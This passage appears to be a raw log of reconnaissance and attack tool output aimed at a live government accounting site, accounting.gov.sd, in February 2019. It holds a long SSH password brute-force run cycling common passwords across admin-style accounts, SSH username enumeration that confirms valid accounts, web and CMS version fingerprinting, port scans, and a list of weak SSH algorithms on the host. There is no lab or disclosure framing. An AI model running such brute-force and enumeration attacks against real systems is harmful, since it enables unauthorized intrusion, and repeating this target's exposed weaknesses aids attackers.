  1170. NSE: [ssh-brute] Trying username/password pair: netadmin:michelle
  1171. NSE: [ssh-brute] Trying username/password pair: guest:michelle
  1172. NSE: [ssh-brute] Trying username/password pair: user:michelle
  1173. NSE: [ssh-brute] Trying username/password pair: web:michelle
  1174. NSE: [ssh-brute] Trying username/password pair: test:michelle
  1175. NSE: [ssh-brute] Trying username/password pair: root:tigger
  1176. NSE: [ssh-brute] Trying username/password pair: admin:tigger
  1177. NSE: [ssh-brute] Trying username/password pair: administrator:tigger
  1178. NSE: [ssh-brute] Trying username/password pair: webadmin:tigger
  1179. NSE: [ssh-brute] Trying username/password pair: sysadmin:tigger
  1180. NSE: [ssh-brute] Trying username/password pair: netadmin:tigger
  1181. NSE: [ssh-brute] Trying username/password pair: guest:tigger
  1182. NSE: [ssh-brute] Trying username/password pair: user:tigger
  1183. NSE: [ssh-brute] Trying username/password pair: web:tigger
  1184. NSE: [ssh-brute] Trying username/password pair: test:tigger
  1185. NSE: [ssh-brute] Trying username/password pair: root:sunshine
  1186. NSE: [ssh-brute] Trying username/password pair: admin:sunshine
  1187. NSE: [ssh-brute] Trying username/password pair: administrator:sunshine
  1188. NSE: [ssh-brute] Trying username/password pair: webadmin:sunshine
  1189. NSE: [ssh-brute] Trying username/password pair: sysadmin:sunshine
  1190. NSE: [ssh-brute] Trying username/password pair: netadmin:sunshine
  1191. NSE: [ssh-brute] Trying username/password pair: guest:sunshine
  1192. NSE: [ssh-brute] Trying username/password pair: user:sunshine
  1193. NSE: [ssh-brute] Trying username/password pair: web:sunshine
  1194. NSE: [ssh-brute] Trying username/password pair: test:sunshine
  1195. NSE: [ssh-brute] Trying username/password pair: root:chocolate
  1196. NSE: [ssh-brute] Trying username/password pair: admin:chocolate
  1197. NSE: [ssh-brute] Trying username/password pair: administrator:chocolate
  1198. NSE: [ssh-brute] Trying username/password pair: webadmin:chocolate
  1199. NSE: [ssh-brute] Trying username/password pair: sysadmin:chocolate
  1200. NSE: [ssh-brute] Trying username/password pair: netadmin:chocolate
  1201. NSE: [ssh-brute] Trying username/password pair: guest:chocolate
  1202. NSE: [ssh-brute] Trying username/password pair: user:chocolate
  1203. NSE: [ssh-brute] Trying username/password pair: web:chocolate
  1204. NSE: [ssh-brute] Trying username/password pair: test:chocolate
  1205. NSE: [ssh-brute] Trying username/password pair: root:password1
  1206. NSE: [ssh-brute] Trying username/password pair: admin:password1
  1207. NSE: [ssh-brute] Trying username/password pair: administrator:password1
  1208. NSE: [ssh-brute] Trying username/password pair: webadmin:password1
  1209. NSE: [ssh-brute] Trying username/password pair: sysadmin:password1
  1210. NSE: [ssh-brute] Trying username/password pair: netadmin:password1
  1211. NSE: [ssh-brute] Trying username/password pair: guest:password1
  1212. NSE: [ssh-brute] Trying username/password pair: user:password1
  1213. NSE: [ssh-brute] Trying username/password pair: web:password1
  1214. NSE: [ssh-brute] Trying username/password pair: test:password1
  1215. NSE: [ssh-brute] Trying username/password pair: root:soccer
  1216. NSE: [ssh-brute] Trying username/password pair: admin:soccer
  1217. NSE: [ssh-brute] Trying username/password pair: administrator:soccer
  1218. NSE: [ssh-brute] Trying username/password pair: webadmin:soccer
  1219. NSE: [ssh-brute] Trying username/password pair: sysadmin:soccer
  1220. NSE: [ssh-brute] Trying username/password pair: netadmin:soccer
  1221. NSE: [ssh-brute] Trying username/password pair: guest:soccer
  1222. NSE: [ssh-brute] Trying username/password pair: user:soccer
  1223. NSE: [ssh-brute] Trying username/password pair: web:soccer
  1224. NSE: [ssh-brute] Trying username/password pair: test:soccer
  1225. NSE: [ssh-brute] Trying username/password pair: root:anthony
  1226. NSE: [ssh-brute] Trying username/password pair: admin:anthony
  1227. NSE: [ssh-brute] Trying username/password pair: administrator:anthony
  1228. NSE: [ssh-brute] Trying username/password pair: webadmin:anthony
  1229. NSE: [ssh-brute] Trying username/password pair: sysadmin:anthony
  1230. NSE: [ssh-brute] Trying username/password pair: netadmin:anthony
  1231. NSE: [ssh-brute] Trying username/password pair: guest:anthony
  1232. NSE: [ssh-brute] Trying username/password pair: user:anthony
  1233. NSE: [ssh-brute] Trying username/password pair: web:anthony
  1234. NSE: [ssh-brute] Trying username/password pair: test:anthony
  1235. NSE: [ssh-brute] Trying username/password pair: root:friends
  1236. NSE: [ssh-brute] Trying username/password pair: admin:friends
  1237. NSE: [ssh-brute] Trying username/password pair: administrator:friends
  1238. NSE: [ssh-brute] Trying username/password pair: webadmin:friends
  1239. NSE: [ssh-brute] Trying username/password pair: sysadmin:friends
  1240. NSE: [ssh-brute] Trying username/password pair: netadmin:friends
  1241. NSE: [ssh-brute] Trying username/password pair: guest:friends
  1242. NSE: [ssh-brute] Trying username/password pair: user:friends
  1243. NSE: [ssh-brute] Trying username/password pair: web:friends
  1244. NSE: [ssh-brute] Trying username/password pair: test:friends
  1245. NSE: [ssh-brute] Trying username/password pair: root:purple
  1246. NSE: [ssh-brute] Trying username/password pair: admin:purple
  1247. NSE: [ssh-brute] Trying username/password pair: administrator:purple
  1248. NSE: [ssh-brute] Trying username/password pair: webadmin:purple
  1249. NSE: [ssh-brute] Trying username/password pair: sysadmin:purple
  1250. NSE: [ssh-brute] Trying username/password pair: netadmin:purple
  1251. NSE: [ssh-brute] Trying username/password pair: guest:purple
  1252. NSE: [ssh-brute] Trying username/password pair: user:purple
  1253. NSE: [ssh-brute] Trying username/password pair: web:purple
  1254. NSE: [ssh-brute] Trying username/password pair: test:purple
  1255. NSE: [ssh-brute] Trying username/password pair: root:angel
  1256. NSE: [ssh-brute] Trying username/password pair: admin:angel
  1257. NSE: [ssh-brute] Trying username/password pair: administrator:angel
  1258. Nmap scan report for accounting.gov.sd (62.12.101.14)
  1259. Host is up (0.33s latency).
  1260.  
  1261. PORT STATE SERVICE VERSION
  1262. 22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
  1263. | ssh-auth-methods:
  1264. | Supported authentication methods:
  1265. | publickey
  1266. | gssapi-keyex
  1267. | gssapi-with-mic
  1268. |_ password
  1269. | ssh-brute:
  1270. | Accounts: No valid accounts found
  1271. |_ Statistics: Performed 333 guesses in 181 seconds, average tps: 2.2
  1272. | ssh-hostkey:
  1273. | 1024 e4:f9:da:cf:9a:e4:fa:b9:38:74:3e:88:f4:41:3c:e7 (DSA)
  1274. |_ 2048 8c:0d:43:e9:5f:4c:24:ac:a2:b5:84:66:ae:7e:12:6a (RSA)
  1275. | ssh-publickey-acceptance:
  1276. |_ Accepted Public Keys: No public keys accepted
  1277. |_ssh-run: Failed to specify credentials and command to run.
  1278. Too many fingerprints match this host to give specific OS details
  1279. Network Distance: 16 hops
  1280.  
  1281. TRACEROUTE (using port 22/tcp)
  1282. HOP RTT ADDRESS
  1283. 1 65.63 ms 10.237.200.1
  1284. 2 65.83 ms 193.37.252.209
  1285. 3 65.66 ms vlan2905.bb1.mia1.us.m247.com (82.102.29.174)
  1286. 4 66.07 ms mai-b1-link.telia.net (213.248.68.36)
  1287. 5 92.52 ms 62.115.119.230
  1288. 6 191.30 ms prs-bb3-link.telia.net (80.91.251.242)
  1289. 7 191.67 ms mei-b2-link.telia.net (62.115.133.175)
  1290. 8 197.93 ms mei-b2-link.telia.net (62.115.133.183)
  1291. 9 226.43 ms flagtelecom-ic-324599-mei-b2.c.telia.net (213.248.72.190)
  1292. 10 211.40 ms ae3.0.cjr02.prs001.flagtel.com (62.216.128.209)
  1293. 11 358.95 ms xe-11-1-1.0.pjr04.dxb001.flagtel.com (85.95.25.162)
  1294. 12 213.23 ms ae3.0.cjr02.prs001.flagtel.com (62.216.128.209)
  1295. 13 323.56 ms 196.29.177.113
  1296. 14 320.62 ms 197.254.196.62
  1297. 15 ...
  1298. 16 331.78 ms 62.12.101.14
  1299. #######################################################################################################################################
  1300. USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
  1301. RHOSTS => accounting.gov.sd
  1302. RHOST => accounting.gov.sd
  1303. [*] 62.12.101.14:22 - SSH - Using malformed packet technique
  1304. [*] 62.12.101.14:22 - SSH - Starting scan
  1305. [-] 62.12.101.14:22 - SSH - User 'admin' not found
  1306. [-] 62.12.101.14:22 - SSH - User 'administrator' not found
  1307. [-] 62.12.101.14:22 - SSH - User 'anonymous' not found
  1308. [-] 62.12.101.14:22 - SSH - User 'backup' not found
  1309. [-] 62.12.101.14:22 - SSH - User 'bee' not found
  1310. [+] 62.12.101.14:22 - SSH - User 'ftp' found
  1311. [-] 62.12.101.14:22 - SSH - User 'guest' not found
  1312. [-] 62.12.101.14:22 - SSH - User 'GUEST' not found
  1313. [-] 62.12.101.14:22 - SSH - User 'info' not found
  1314. [+] 62.12.101.14:22 - SSH - User 'mail' found
  1315. [-] 62.12.101.14:22 - SSH - User 'mailadmin' not found
  1316. [-] 62.12.101.14:22 - SSH - User 'msfadmin' not found
  1317. [+] 62.12.101.14:22 - SSH - User 'mysql' found
  1318. [+] 62.12.101.14:22 - SSH - User 'nobody' found
  1319. [-] 62.12.101.14:22 - SSH - User 'oracle' not found
  1320. [-] 62.12.101.14:22 - SSH - User 'owaspbwa' not found
  1321. [+] 62.12.101.14:22 - SSH - User 'postfix' found
  1322. [-] 62.12.101.14:22 - SSH - User 'postgres' not found
  1323. [-] 62.12.101.14:22 - SSH - User 'private' not found
  1324. [-] 62.12.101.14:22 - SSH - User 'proftpd' not found
  1325. [-] 62.12.101.14:22 - SSH - User 'public' not found
  1326. [+] 62.12.101.14:22 - SSH - User 'root' found
  1327. [-] 62.12.101.14:22 - SSH - User 'superadmin' not found
  1328. [-] 62.12.101.14:22 - SSH - User 'support' not found
  1329. [-] 62.12.101.14:22 - SSH - User 'sys' not found
  1330. [-] 62.12.101.14:22 - SSH - User 'system' not found
  1331. [-] 62.12.101.14:22 - SSH - User 'systemadmin' not found
  1332. [-] 62.12.101.14:22 - SSH - User 'systemadministrator' not found
  1333. [-] 62.12.101.14:22 - SSH - User 'test' not found
  1334. [+] 62.12.101.14:22 - SSH - User 'tomcat' found
  1335. [-] 62.12.101.14:22 - SSH - User 'user' not found
  1336. [-] 62.12.101.14:22 - SSH - User 'webmaster' not found
  1337. [-] 62.12.101.14:22 - SSH - User 'www-data' not found
  1338. [-] 62.12.101.14:22 - SSH - User 'Fortimanager_Access' not found
  1339. [*] Scanned 1 of 1 hosts (100% complete)
  1340. [*] Auxiliary module execution completed
  1341. #######################################################################################################################################
  1342. http://accounting.gov.sd [200 OK] Apache[2.2,2.2.15], Cookies[38fe2784091f2c2f81131c445ff0bfb3], HTML5, HTTPServer[CentOS][Apache/2.2.15 (CentOS)], HttpOnly[38fe2784091f2c2f81131c445ff0bfb3], IP[62.12.101.14], JQuery, maybe Joomla, Meta-Author[Super User], MetaGenerator[Joomla! - Open Source Content Management], OpenSearch[http://accounting.gov.sd/index.php/component/search/?id=86&amp;Itemid=470&amp;format=opensearch], PHP[5.6.18], Script[text/javascript], Title[الرئيسية - ديوان الحسابات], UncommonHeaders[x-logged-in], X-Powered-By[PHP/5.6.18]
  1343. #######################################################################################################################################
  1344. wig - WebApp Information Gatherer
  1345.  
  1346.  
  1347. Scanning http://accounting.gov.sd...
  1348. ___________________________________________ SITE INFO ____________________________________________
  1349. IP Title
  1350. 62.12.101.14 الرئيسية - ديوان الحسابات
  1351.  
  1352. ____________________________________________ VERSION _____________________________________________
  1353. Name Versions Type
  1354. Joomla! 3.4.4 | 3.4.4-rc | 3.4.4-rc2 | 3.4.5 | 3.4.6 | 3.4.7 | 3.4.8 CMS
  1355. 3.4.8-rc
  1356. Apache 2.2.15 Platform
  1357. PHP 5.6.18 Platform
  1358. CentOS 6.6 | 6.8 OS
  1359.  
  1360. __________________________________________ INTERESTING ___________________________________________
  1361. URL Note Type
  1362. /robots.txt robots.txt index Interesting
  1363.  
  1364. _____________________________________________ TOOLS ______________________________________________
  1365. Name Link Software
  1366. CMSmap https://github.com/Dionach/CMSmap Joomla!
  1367. joomscan http://sourceforge.net/projects/joomscan/ Joomla!
  1368.  
  1369. __________________________________________________________________________________________________
  1370. Time: 101.1 sec Urls: 845 Fingerprints: 40401
  1371. #######################################################################################################################################
  1372. HTTP/1.1 200 OK
  1373. Date: Tue, 12 Feb 2019 02:25:05 GMT
  1374. Server: Apache/2.2.15 (CentOS)
  1375. X-Powered-By: PHP/5.6.18
  1376. Set-Cookie: 38fe2784091f2c2f81131c445ff0bfb3=cfssrnih0ueihqn0k2lvcuh705; path=/; HttpOnly
  1377. X-Logged-In: False
  1378. P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
  1379. Expires: Mon, 1 Jan 2001 00:00:00 GMT
  1380. Last-Modified: Tue, 12 Feb 2019 02:25:06 GMT
  1381. Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  1382. Pragma: no-cache
  1383. Connection: close
  1384. Content-Type: text/html; charset=utf-8
  1385.  
  1386. HTTP/1.1 200 OK
  1387. Date: Tue, 12 Feb 2019 02:25:06 GMT
  1388. Server: Apache/2.2.15 (CentOS)
  1389. X-Powered-By: PHP/5.6.18
  1390. Set-Cookie: 38fe2784091f2c2f81131c445ff0bfb3=p9ipj07dnlv3kg85d0dksgeo44; path=/; HttpOnly
  1391. X-Logged-In: False
  1392. P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
  1393. Expires: Mon, 1 Jan 2001 00:00:00 GMT
  1394. Last-Modified: Tue, 12 Feb 2019 02:25:07 GMT
  1395. Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  1396. Pragma: no-cache
  1397. Connection: close
  1398. Content-Type: text/html; charset=utf-8
  1399. #######################################################################################################################################
  1400. Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-11 21:09 EST
  1401. Nmap scan report for 62.12.101.14
  1402. Host is up (0.14s latency).
  1403. Not shown: 467 filtered ports, 6 closed ports
  1404. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  1405. PORT STATE SERVICE
  1406. 22/tcp open ssh
  1407. 80/tcp open http
  1408. 443/tcp open https
  1409. #######################################################################################################################################
  1410. Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-11 21:09 EST
  1411. Nmap scan report for 62.12.101.14
  1412. Host is up (0.066s latency).
  1413. Not shown: 2 filtered ports
  1414. PORT STATE SERVICE
  1415. 53/udp open|filtered domain
  1416. 67/udp open|filtered dhcps
  1417. 68/udp open|filtered dhcpc
  1418. 69/udp open|filtered tftp
  1419. 88/udp open|filtered kerberos-sec
  1420. 123/udp open|filtered ntp
  1421. 139/udp open|filtered netbios-ssn
  1422. 161/udp open|filtered snmp
  1423. 162/udp open|filtered snmptrap
  1424. 389/udp open|filtered ldap
  1425. 520/udp open|filtered route
  1426. 2049/udp open|filtered nfs
  1427. #######################################################################################################################################
  1428. # general
  1429. (gen) banner: SSH-2.0-OpenSSH_5.3
  1430. (gen) software: OpenSSH 5.3
  1431. (gen) compatibility: OpenSSH 5.9-6.6, Dropbear SSH 2013.56+ (some functionality from 0.52)
  1432. (gen) compression: enabled (zlib@openssh.com)
  1433.  
  1434. # key exchange algorithms
  1435. (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
  1436. `- [info] available since OpenSSH 4.4
  1437. (kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1438. `- [warn] using weak hashing algorithm
  1439. `- [info] available since OpenSSH 2.3.0
  1440. (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
  1441. `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
  1442. (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1443. `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
  1444. `- [warn] using small 1024-bit modulus
  1445. `- [warn] using weak hashing algorithm
  1446. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
  1447.  
  1448. # host-key algorithms
  1449. (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
  1450. (key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
  1451. `- [warn] using small 1024-bit modulus
  1452. `- [warn] using weak random number generator could reveal the key
  1453. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  1454.  
  1455. # encryption algorithms (ciphers)
  1456. (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
  1457. (enc) aes192-ctr -- [info] available since OpenSSH 3.7
  1458. (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
  1459. (enc) arcfour256 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1460. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  1461. `- [warn] using weak cipher
  1462. `- [info] available since OpenSSH 4.2
  1463. (enc) arcfour128 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1464. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  1465. `- [warn] using weak cipher
  1466. `- [info] available since OpenSSH 4.2
  1467. (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1468. `- [warn] using weak cipher mode
  1469. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
  1470. (enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1471. `- [warn] using weak cipher
  1472. `- [warn] using weak cipher mode
  1473. `- [warn] using small 64-bit block size
  1474. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
  1475. (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1476. `- [fail] disabled since Dropbear SSH 0.53
  1477. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  1478. `- [warn] using weak cipher mode
  1479. `- [warn] using small 64-bit block size
  1480. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
  1481. (enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1482. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  1483. `- [warn] using weak cipher mode
  1484. `- [warn] using small 64-bit block size
  1485. `- [info] available since OpenSSH 2.1.0
  1486. (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1487. `- [warn] using weak cipher mode
  1488. `- [info] available since OpenSSH 2.3.0
  1489. (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1490. `- [warn] using weak cipher mode
  1491. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
  1492. (enc) arcfour -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1493. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  1494. `- [warn] using weak cipher
  1495. `- [info] available since OpenSSH 2.1.0
  1496. (enc) rijndael-cbc@lysator.liu.se -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1497. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  1498. `- [warn] using weak cipher mode
  1499. `- [info] available since OpenSSH 2.3.0
  1500.  
  1501. # message authentication code algorithms
  1502. (mac) hmac-md5 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1503. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  1504. `- [warn] using encrypt-and-MAC mode
  1505. `- [warn] using weak hashing algorithm
  1506. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  1507. (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
  1508. `- [warn] using weak hashing algorithm
  1509. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  1510. (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
  1511. `- [warn] using small 64-bit tag size
  1512. `- [info] available since OpenSSH 4.7
  1513. (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
  1514. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
  1515. (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
  1516. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
  1517. (mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1518. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  1519. `- [warn] using encrypt-and-MAC mode
  1520. `- [info] available since OpenSSH 2.5.0
  1521. (mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1522. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  1523. `- [warn] using encrypt-and-MAC mode
  1524. `- [info] available since OpenSSH 2.1.0
  1525. (mac) hmac-sha1-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1526. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  1527. `- [warn] using encrypt-and-MAC mode
  1528. `- [warn] using weak hashing algorithm
  1529. `- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.47
  1530. (mac) hmac-md5-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1531. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  1532. `- [warn] using encrypt-and-MAC mode
  1533. `- [warn] using weak hashing algorithm
  1534. `- [info] available since OpenSSH 2.5.0
  1535.  
  1536. # algorithm recommendations (for OpenSSH 5.3)
  1537. (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
  1538. (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
  1539. (rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
  1540. (rec) -ssh-dss -- key algorithm to remove
  1541. (rec) -arcfour -- enc algorithm to remove
  1542. (rec) -rijndael-cbc@lysator.liu.se -- enc algorithm to remove
  1543. (rec) -blowfish-cbc -- enc algorithm to remove
  1544. (rec) -3des-cbc -- enc algorithm to remove
  1545. (rec) -aes256-cbc -- enc algorithm to remove
  1546. (rec) -arcfour256 -- enc algorithm to remove
  1547. (rec) -cast128-cbc -- enc algorithm to remove
  1548. (rec) -aes192-cbc -- enc algorithm to remove
  1549. (rec) -arcfour128 -- enc algorithm to remove
  1550. (rec) -aes128-cbc -- enc algorithm to remove
  1551. (rec) -hmac-md5-96 -- mac algorithm to remove
  1552. (rec) -hmac-ripemd160 -- mac algorithm to remove
  1553. (rec) -hmac-sha1-96 -- mac algorithm to remove
  1554. (rec) -umac-64@openssh.com -- mac algorithm to remove
  1555. (rec) -hmac-md5 -- mac algorithm to remove
  1556. (rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
  1557. (rec) -hmac-sha1 -- mac algorithm to remove
  1558. #######################################################################################################################################
  1559. Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-11 21:09 EST
  1560. NSE: [ssh-run] Failed to specify credentials and command to run.
  1561. NSE: [ssh-brute] Trying username/password pair: root:root
  1562. NSE: [ssh-brute] Trying username/password pair: admin:admin
  1563. NSE: [ssh-brute] Trying username/password pair: administrator:administrator
  1564. NSE: [ssh-brute] Trying username/password pair: webadmin:webadmin
  1565. NSE: [ssh-brute] Trying username/password pair: sysadmin:sysadmin
  1566. NSE: [ssh-brute] Trying username/password pair: netadmin:netadmin
  1567. NSE: [ssh-brute] Trying username/password pair: guest:guest
  1568. NSE: [ssh-brute] Trying username/password pair: user:user
  1569. NSE: [ssh-brute] Trying username/password pair: web:web
  1570. NSE: [ssh-brute] Trying username/password pair: test:test
  1571. NSE: [ssh-brute] Trying username/password pair: root:
  1572. NSE: [ssh-brute] Trying username/password pair: admin:
  1573. NSE: [ssh-brute] Trying username/password pair: administrator:
  1574. NSE: [ssh-brute] Trying username/password pair: webadmin:
  1575. NSE: [ssh-brute] Trying username/password pair: sysadmin:
  1576. NSE: [ssh-brute] Trying username/password pair: netadmin:
  1577. NSE: [ssh-brute] Trying username/password pair: guest:
  1578. NSE: [ssh-brute] Trying username/password pair: user:
  1579. NSE: [ssh-brute] Trying username/password pair: web:
  1580. NSE: [ssh-brute] Trying username/password pair: test:
  1581. NSE: [ssh-brute] Trying username/password pair: root:123456
  1582. NSE: [ssh-brute] Trying username/password pair: admin:123456
  1583. NSE: [ssh-brute] Trying username/password pair: administrator:123456
  1584. NSE: [ssh-brute] Trying username/password pair: webadmin:123456
  1585. NSE: [ssh-brute] Trying username/password pair: sysadmin:123456
  1586. NSE: [ssh-brute] Trying username/password pair: netadmin:123456
  1587. NSE: [ssh-brute] Trying username/password pair: guest:123456
  1588. NSE: [ssh-brute] Trying username/password pair: user:123456
  1589. NSE: [ssh-brute] Trying username/password pair: web:123456
  1590. NSE: [ssh-brute] Trying username/password pair: test:123456
  1591. NSE: [ssh-brute] Trying username/password pair: root:12345
  1592. NSE: [ssh-brute] Trying username/password pair: admin:12345
  1593. NSE: [ssh-brute] Trying username/password pair: administrator:12345
  1594. NSE: [ssh-brute] Trying username/password pair: webadmin:12345
  1595. NSE: [ssh-brute] Trying username/password pair: sysadmin:12345
  1596. NSE: [ssh-brute] Trying username/password pair: netadmin:12345
  1597. NSE: [ssh-brute] Trying username/password pair: guest:12345
  1598. NSE: [ssh-brute] Trying username/password pair: user:12345
  1599. NSE: [ssh-brute] Trying username/password pair: web:12345
  1600. NSE: [ssh-brute] Trying username/password pair: test:12345
  1601. NSE: [ssh-brute] Trying username/password pair: root:123456789
  1602. NSE: [ssh-brute] Trying username/password pair: admin:123456789
  1603. NSE: [ssh-brute] Trying username/password pair: administrator:123456789
  1604. NSE: [ssh-brute] Trying username/password pair: webadmin:123456789
  1605. NSE: [ssh-brute] Trying username/password pair: sysadmin:123456789
  1606. NSE: [ssh-brute] Trying username/password pair: netadmin:123456789
  1607. NSE: [ssh-brute] Trying username/password pair: guest:123456789
  1608. NSE: [ssh-brute] Trying username/password pair: user:123456789
  1609. NSE: [ssh-brute] Trying username/password pair: web:123456789
  1610. NSE: [ssh-brute] Trying username/password pair: test:123456789
  1611. NSE: [ssh-brute] Trying username/password pair: root:password
  1612. NSE: [ssh-brute] Trying username/password pair: admin:password
  1613. NSE: [ssh-brute] Trying username/password pair: administrator:password
  1614. NSE: [ssh-brute] Trying username/password pair: webadmin:password
  1615. NSE: [ssh-brute] Trying username/password pair: sysadmin:password
  1616. NSE: [ssh-brute] Trying username/password pair: netadmin:password
  1617. NSE: [ssh-brute] Trying username/password pair: guest:password
  1618. NSE: [ssh-brute] Trying username/password pair: user:password
  1619. NSE: [ssh-brute] Trying username/password pair: web:password
  1620. NSE: [ssh-brute] Trying username/password pair: test:password
  1621. NSE: [ssh-brute] Trying username/password pair: root:iloveyou
  1622. NSE: [ssh-brute] Trying username/password pair: admin:iloveyou
  1623. NSE: [ssh-brute] Trying username/password pair: administrator:iloveyou
  1624. NSE: [ssh-brute] Trying username/password pair: webadmin:iloveyou
  1625. NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveyou
  1626. NSE: [ssh-brute] Trying username/password pair: netadmin:iloveyou
  1627. NSE: [ssh-brute] Trying username/password pair: guest:iloveyou
  1628. NSE: [ssh-brute] Trying username/password pair: user:iloveyou
  1629. NSE: [ssh-brute] Trying username/password pair: web:iloveyou
  1630. NSE: [ssh-brute] Trying username/password pair: test:iloveyou
  1631. NSE: [ssh-brute] Trying username/password pair: root:princess
  1632. NSE: [ssh-brute] Trying username/password pair: admin:princess
  1633. NSE: [ssh-brute] Trying username/password pair: administrator:princess
  1634. NSE: [ssh-brute] Trying username/password pair: webadmin:princess
  1635. NSE: [ssh-brute] Trying username/password pair: sysadmin:princess
  1636. NSE: [ssh-brute] Trying username/password pair: netadmin:princess
  1637. NSE: [ssh-brute] Trying username/password pair: guest:princess
  1638. NSE: [ssh-brute] Trying username/password pair: user:princess
  1639. NSE: [ssh-brute] Trying username/password pair: web:princess
  1640. NSE: [ssh-brute] Trying username/password pair: test:princess
  1641. NSE: [ssh-brute] Trying username/password pair: root:12345678
  1642. NSE: [ssh-brute] Trying username/password pair: admin:12345678
  1643. NSE: [ssh-brute] Trying username/password pair: administrator:12345678
  1644. NSE: [ssh-brute] Trying username/password pair: webadmin:12345678
  1645. NSE: [ssh-brute] Trying username/password pair: sysadmin:12345678
  1646. NSE: [ssh-brute] Trying username/password pair: netadmin:12345678
  1647. NSE: [ssh-brute] Trying username/password pair: guest:12345678
  1648. NSE: [ssh-brute] Trying username/password pair: user:12345678
  1649. NSE: [ssh-brute] Trying username/password pair: web:12345678
  1650. NSE: [ssh-brute] Trying username/password pair: test:12345678
  1651. NSE: [ssh-brute] Trying username/password pair: root:1234567
  1652. NSE: [ssh-brute] Trying username/password pair: admin:1234567
  1653. NSE: [ssh-brute] Trying username/password pair: administrator:1234567
  1654. NSE: [ssh-brute] Trying username/password pair: webadmin:1234567
  1655. NSE: [ssh-brute] Trying username/password pair: sysadmin:1234567
  1656. NSE: [ssh-brute] Trying username/password pair: netadmin:1234567
  1657. NSE: [ssh-brute] Trying username/password pair: guest:1234567
  1658. NSE: [ssh-brute] Trying username/password pair: user:1234567
  1659. NSE: [ssh-brute] Trying username/password pair: web:1234567
  1660. NSE: [ssh-brute] Trying username/password pair: test:1234567
  1661. NSE: [ssh-brute] Trying username/password pair: root:abc123
  1662. NSE: [ssh-brute] Trying username/password pair: admin:abc123
  1663. NSE: [ssh-brute] Trying username/password pair: administrator:abc123
  1664. NSE: [ssh-brute] Trying username/password pair: webadmin:abc123
  1665. NSE: [ssh-brute] Trying username/password pair: sysadmin:abc123
  1666. NSE: [ssh-brute] Trying username/password pair: netadmin:abc123
  1667. NSE: [ssh-brute] Trying username/password pair: guest:abc123
  1668. NSE: [ssh-brute] Trying username/password pair: user:abc123
  1669. NSE: [ssh-brute] Trying username/password pair: web:abc123
